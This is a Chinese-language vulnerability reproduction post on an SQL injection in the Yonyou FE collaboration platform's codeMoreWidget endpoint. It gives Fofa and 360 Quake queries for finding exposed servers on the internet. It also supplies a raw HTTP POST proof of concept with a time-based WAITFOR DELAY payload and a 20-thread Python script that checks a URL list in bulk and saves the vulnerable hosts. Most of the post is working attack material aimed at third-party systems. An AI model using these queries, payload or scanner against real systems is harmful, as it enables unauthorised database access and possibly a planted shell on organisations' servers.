【致远互联FE协作办公平台 codeMoreWidget SQL注入】复现

目录

一、漏洞简介

二、资产测绘

三、POC信息

四、脚本批量验证

---

一、漏洞简介

    致远互联FE协作办公平台（Yonyou U8 FE）是由北京致远互联科技股份有限公司开发的一款企业级协同办公平台。它主要提供以下功能和特点：协同办公：支持团队成员之间的协作和信息共享，包括任务管理、日程安排、文档协作等功能。信息化管理：提供企业级信息管理功能，包括客户关系管理（CRM）、人力资源管理（HRM）、财务管理等模块。流程管理：支持工作流程的自定义设计和管理，帮助企业优化内部运营流程，提升效率和管理水平。漏洞位于/common/codeMoreWidget.js%70接口未对POST传递的code参数做sql注入防范导致攻击者可以获取到数据库信息，甚至在高权限的情况下写入shell。

二、资产测绘

Fofa：
body="li_plugins_download"

360quake：
body:"li_plugins_download"

三、POC信息

POST /common/codeMoreWidget.js%70 HTTP/1.1 
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36

code=1';WAITFOR DELAY '0:0:3'--

sqlmap验证:

四、脚本批量验证

url.txt中加入目标网站

import requests
from requests.exceptions import RequestException
import urllib3
import time
import threading
from queue import Queue

urllib3.disable_warnings()

post_data = {
    "code": "1';WAITFOR DELAY '0:0:5'--"
}

header = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                  "(KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36",
    "Accept": "*/*",
    "Accept-Language": "zh-CN,zh;q=0.9",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
}

result_list = []

def poc(url):
    url = url.strip()  
    url = url + "/common/codeMoreWidget.js%70"
    try:
        start_time = time.time()
        response = requests.post(url, data=post_data, verify=False, headers=header, timeout=15)
        end_time = time.time()
        pass_time = end_time - start_time
        # pass_time = int(pass_time)

        return pass_time

    except RequestException as e:
        # print(f"请求错误：{e}")
        return None

def worker():
    while True:
        url = task_queue.get()
        if url is None:
            break
        return_time = poc(url)
        if return_time is not None and return_time >= 5:
            print(f"{url.strip()}：存在漏洞")
            result_list.append(url.strip())
        task_queue.task_done()

def panduan():
    with open("url.txt", "r") as check_file:
        for url in check_file:
            task_queue.put(url)

    
    num_threads = 20  # 

    # 线程池
    threads = []
    for _ in range(num_threads):
        t = threading.Thread(target=worker)
        t.start()
        threads.append(t)

    # 等待
    task_queue.join()

    
    for _ in range(num_threads):
        task_queue.put(None)
    for t in threads:
        t.join()

   
    with open("vulnerable.txt", "w") as result_file:
        for url in result_list:
            result_file.write(url + "\n")

if __name__ == '__main__':
    task_queue = Queue()
    panduan()
    print("扫描完成")